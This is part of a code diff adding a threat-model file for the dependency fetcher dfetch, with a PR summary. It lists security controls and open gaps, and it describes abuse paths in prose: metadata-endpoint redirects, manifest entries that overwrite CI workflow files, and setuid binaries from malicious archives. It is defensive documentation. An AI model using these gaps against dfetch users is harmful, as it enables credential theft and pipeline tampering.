+            "``GIT_TERMINAL_PROMPT=0``, ``BatchMode=yes`` for Git; "
+            "``--non-interactive`` for SVN.  Credential prompts are suppressed to "
+            "prevent interactive hijacking in CI."
+        ),
+    ),
+    Control(
+        id="C-007",
+        name="Subprocess safety",
+        assets=["A-22"],
+        threats=["DFT-06"],
+        reference="dfetch/util/cmdline.py",
+        assessment=ControlAssessment(
+            risk="High", stride=["Tampering", "Elevation of Privilege"]
+        ),
+        description=(
+            "All external commands invoked with ``shell=False`` and list-form "
+            "arguments - no shell-injection vector."
+        ),
+    ),
+    Control(
+        id="C-008",
+        name="Manifest input validation",
+        assets=["A-12"],
+        threats=["DFT-04", "DFT-08"],
+        reference="dfetch/manifest/schema.py",
+        assessment=ControlAssessment(risk="High", stride=["Tampering"]),
+        description=(
+            r'StrictYAML schema with ``SAFE_STR = Regex(r"^[^\x00-\x1F\x7F-\x9F]*$")`` '
+            "rejects control characters in all string fields."
+        ),
+    ),
+    Control(
+        id="C-034",
+        name="Hash algorithm allowlist (SHA-256/384/512 only)",
+        assets=["A-14"],
+        threats=["DFT-30"],
+        reference="dfetch/vcs/integrity_hash.py",
+        assessment=ControlAssessment(
+            status="implemented", risk="High", stride=["Tampering", "Spoofing"]
+        ),
+        description=(
+            "``integrity_hash.py`` accepts only ``sha256:``, ``sha384:``, and "
+            "``sha512:`` prefixes; any other algorithm prefix is rejected at parse "
+            "time.  MD5 and SHA-1 are not accepted.  "
+            "This directly mitigates DFT-30 (SLSA M2: exploit cryptographic hash "
+            "collisions) by ensuring that integrity hashes, when present, use "
+            "algorithms with no known practical collision attacks."
+        ),
+    ),
+    # ── Gaps ─────────────────────────────────────────────────────────────────
+    Control(
+        id="C-018",
+        name="Optional integrity hash",
+        assets=["A-13", "A-14"],
+        threats=["DFT-01", "DFT-02"],
+        assessment=ControlAssessment(
+            status="gap", risk="Critical", stride=["Tampering", "Spoofing"]
+        ),
+        description=(
+            "``integrity.hash`` in the manifest is optional.  Archive dependencies "
+            "without it have no content-authenticity guarantee.  Plain ``http://`` "
+            "URLs receive no protection at all - neither transport nor content "
+            "integrity is enforced."
+        ),
+    ),
+    Control(
+        id="C-019",
+        name="No integrity mechanism for Git/SVN",
+        assets=["A-13", "A-14"],
+        threats=["DFT-02", "DFT-05"],
+        assessment=ControlAssessment(
+            status="gap", risk="High", stride=["Tampering", "Spoofing"]
+        ),
+        description=(
+            "Git and SVN dependencies carry no equivalent to ``integrity.hash``.  "
+            "Transport security (TLS or SSH) authenticates the server and channel "
+            "but cannot detect content legitimately served by a compromised upstream.  "
+            "Mutable references (branch, tag) can silently fetch different content "
+            "after a force-push.  Pinning to an immutable commit SHA is the "
+            "strongest available mitigation but is not currently enforced by dfetch."
+        ),
+    ),
+    Control(
+        id="C-020",
+        name="No patch-file integrity",
+        assets=["A-19", "A-13"],
+        threats=["DFT-08", "DFT-03"],
+        assessment=ControlAssessment(
+            status="gap",
+            risk="Critical",
+            stride=["Tampering", "Elevation of Privilege"],
+        ),
+        description=(
+            "Patch files referenced in the manifest carry no integrity hash.  A "
+            "tampered or attacker-controlled patch file can write to arbitrary paths; "
+            "path-safety is delegated entirely to ``patch-ng``'s internal implementation "
+            "and is not independently verified by dfetch before application."
+        ),
+    ),
+    Control(
+        id="C-027",
+        name="No redirect destination validation on archive downloads",
+        assets=["A-13"],
+        threats=["DFT-12"],
+        assessment=ControlAssessment(
+            status="gap", risk="High", stride=["Information Disclosure"]
+        ),
+        description=(
+            "Archive downloads follow up to 10 HTTP 3xx redirects without "
+            "validating the destination host against an allowlist.  "
+            "A compromised or malicious archive server can redirect to an "
+            "internal metadata endpoint (e.g. ``http://169.254.169.254/``) "
+            "and dfetch will follow the redirect, potentially retrieving and "
+            "writing internal credentials to disk.  Plain ``http://`` URLs "
+            "amplify the risk - both the original request and the redirect "
+            "are unencrypted.  "
+            "Fix: reject redirects resolving to RFC-1918, loopback, or "
+            "link-local ranges before following."
+        ),
+    ),
+    Control(
+        id="C-028",
+        name="No denylist for security-sensitive destination paths",
+        assets=["A-12", "A-13"],
+        threats=["DFT-16"],
+        assessment=ControlAssessment(
+            status="gap", risk="High", stride=["Tampering", "Elevation of Privilege"]
+        ),
+        description=(
+            "dfetch's path-traversal check (C-001) prevents writes outside "
+            "the project root but does not maintain a denylist of "
+            "security-sensitive within-root paths.  "
+            "A manifest entry with ``dst: .github/workflows/`` would pass "
+            "all current validation and silently overwrite CI pipeline "
+            "definitions on the next ``dfetch update``.  "
+            "Should warn or error when ``dst:`` resolves under known-sensitive "
+            "prefixes (``.github/``, ``.circleci/``, ``Makefile``, etc.), "
+            "or require all destinations to fall under an explicit vendor root."
+        ),
+    ),
+    Control(
+        id="C-029",
+        name="Nested dependency references in vendored source are out of dfetch scope",
+        assets=["A-13"],
+        threats=["DFT-22"],
+        assessment=ControlAssessment(
+            status="implemented", risk="Low", stride=["Tampering"]
+        ),
+        description=(
+            "DFT-22 (vendored content containing submodule or nested external "
+            "references) describes threats that arise when the consuming build "
+            "system processes build manifests embedded in vendored source "
+            "(CMakeLists.txt, package.json, Cargo.toml, etc.).  "
+            "Per the 'dfetch scope boundary' assumption, dfetch exports source "
+            "files - it does not execute or resolve build-system instructions "
+            "within them.  The responsibility for nested dependency resolution "
+            "belongs to the manifest author and the consuming build system.  "
+            "Consumers should audit vendored repositories for nested package "
+            "manifests and treat all fetched source as untrusted."
+        ),
+    ),
+    Control(
+        id="C-030",
+        name="No timeout or resource cap on VCS operations",
+        assets=["A-20", "A-13"],
+        threats=["DFT-09"],
+        assessment=ControlAssessment(
+            status="gap", risk="Low", stride=["Denial of Service"]
+        ),
+        description=(
+            "Git clone and SVN export operations have no configurable timeout or "
+            "maximum-transfer-size limit.  A pathological or compromised upstream "
+            "can deliver arbitrarily large packfiles or working trees, causing "
+            "disk exhaustion or prolonged CI runner occupation.  "
+            "The 500 MB / 10k-member archive limits (C-002) do not apply to raw "
+            "VCS checkouts.  Shallow clones (``--depth=1``) mitigate history "
+            "size but do not bound working-tree size."
+        ),
+    ),
+    Control(
+        id="C-031",
+        name="No verification of signed Git tags or Sigstore attestations",
+        assets=["A-13", "A-14"],
+        threats=["DFT-05", "DFT-21"],
+        assessment=ControlAssessment(
+            status="gap", risk="Medium", stride=["Spoofing", "Tampering"]
+        ),
+        description=(
+            "dfetch does not verify GPG-signed Git tags or Sigstore tag attestations "
+            "when resolving VCS dependencies.  Upstreams that publish signed releases "
+            "offer a stronger authenticity guarantee than transport security alone, "
+            "but dfetch cannot take advantage of it.  "
+            "This is distinct from C-019: signing would authenticate which commit a "
+            "tag names, not the content of the working tree.  "
+            "For repositories that do publish signed releases, users should pin to "
+            "the commit SHA recorded after manually running ``git tag -v``."
+        ),
+    ),
+    Control(
+        id="C-035",
+        name="No upstream SLSA source level verification",
+        assets=["A-09", "A-23"],
+        threats=["DFT-31", "DFT-32"],
+        assessment=ControlAssessment(
+            status="gap", risk="Medium", stride=["Spoofing", "Tampering"]
+        ),
+        description=(
+            "dfetch has no mechanism to check whether an upstream VCS source publishes "
+            "or meets any SLSA source level.  The manifest schema has no field for "
+            "declaring the expected SLSA source level of a dependency, and no tooling "
+            "exists to fetch or verify Source Provenance Attestations or VSAs (A-23).  "
+            "Consumers must manually assess the upstream's review, branch-protection, "
+            "and ancestry-enforcement posture before trusting a dependency pin - this "
+            "is undocumented and unenforced by dfetch.  "
+            "DFT-31 (no VSA) and DFT-32 (no two-party review) both stem from this gap.  "
+            "Fix: add an optional ``slsa_source_level:`` field to the manifest schema "
+            "and implement VSA fetch-and-verify during ``dfetch update``."
+        ),
+    ),
+    Control(
+        id="C-036",
+        name="No ancestry reachability check after VCS fetch",
+        assets=["A-09", "A-13"],
+        threats=["DFT-33"],
+        assessment=ControlAssessment(status="gap", risk="Low", stride=["Tampering"]),
+        description=(
+            "dfetch does not verify whether a pinned commit SHA remains reachable "
+            "from the upstream's current default branch after fetching.  An upstream "
+            "that rewrites its history - interactive rebase, filter-branch, or "
+            "force-push to main - can orphan a previously-audited SHA without "
+            "triggering any alert.  SLSA Source Level 2 requires ancestry enforcement: "
+            "the upstream must prevent such rewrites.  dfetch cannot enforce this on "
+            "the upstream, but could detect lineage breaks post-fetch.  "
+            "Fix: after fetching a commit SHA, run ``git merge-base --is-ancestor "
+            "<sha> <remote>/<default-branch>`` and warn when the SHA is unreachable."
+        ),
+    ),
+    Control(
+        id="C-041",
+        name="SVN externals not suppressed (--ignore-externals flag unused)",
+        assets=["A-13", "A-09"],
+        threats=["DFT-15"],
+        assessment=ControlAssessment(status="gap", risk="High", stride=["Tampering"]),
+        reference="dfetch/vcs/svn.py",
+        description=(
+            "``svn export`` is invoked without the ``--ignore-externals`` flag.  "
+            "SVN repositories with ``svn:externals`` properties trigger undeclared "
+            "fetches from third-party servers that bypass dfetch's manifest controls, "
+            "integrity checks, and code-review audit trail.  Each external fetch is "
+            "unverified and unavailable for inspection before vendoring."
+        ),
+    ),
+    Control(
+        id="C-042",
+        name="setuid/setgid bits preserved during TAR extraction on Python < 3.11.4",
+        assets=["A-13", "A-20"],
+        threats=["DFT-14"],
+        assessment=ControlAssessment(
+            status="gap", risk="High", stride=["Tampering", "Elevation of Privilege"]
+        ),
+        reference="dfetch/vcs/archive.py",
+        description=(
+            "On Python versions prior to 3.11.4, ``tarfile.extractall()`` does not "
+            "apply the ``filter='tar'`` parameter and preserves setuid, setgid, and "
+            "sticky bits encoded in TAR member headers.  A malicious archive can "
+            "introduce setuid-root binaries into the vendor directory; a later build "
+            "step that invokes the extracted binary executes with elevated privileges.  "
+            "This affects all dfetch users on Python < 3.11.4."
+        ),
+    ),
+]
+
+_USAGE_ASSET_IDS = {
+    "A-09",
+    "A-10",
+    "A-11",
+    "A-12",
+    "A-13",
+    "A-14",
+    "A-15",
+    "A-16",
+    "A-17",
+    "A-18",
+    "A-19",
+    "A-20",
+    "A-21",
+    "A-22",
+    "A-23",
+}
+ASSET_CONTROLS: dict[str, list[Control]] = build_asset_controls_index(
+    CONTROLS, _USAGE_ASSET_IDS
+)
+
+if __name__ == "__main__":
+    run_model(build_model, CONTROLS)


### PR DESCRIPTION


<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

* **Documentation**
  * Expanded security guide with a 33-entry threat catalog, SLSA v1.2 cross-references, pinned tooling install guidance, and CLI examples to generate threat-model reports and diagrams.
  * Added a new Markdown report template for structured security reports.

* **New Features**
  * Added supply-chain and runtime-usage threat models with attacker profiles, assets, controls, and documented gaps.
  * Added shared reporting utilities to render findings, controls, and diagrams in generated reports.

<!-- review_stack_entry_start -->

[![Review Change Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/dfetch-org/dfetch/pull/1182)

<!-- review_stack_entry_end -->
<!-- end of auto-generated comment: release notes by coderabbit.ai -->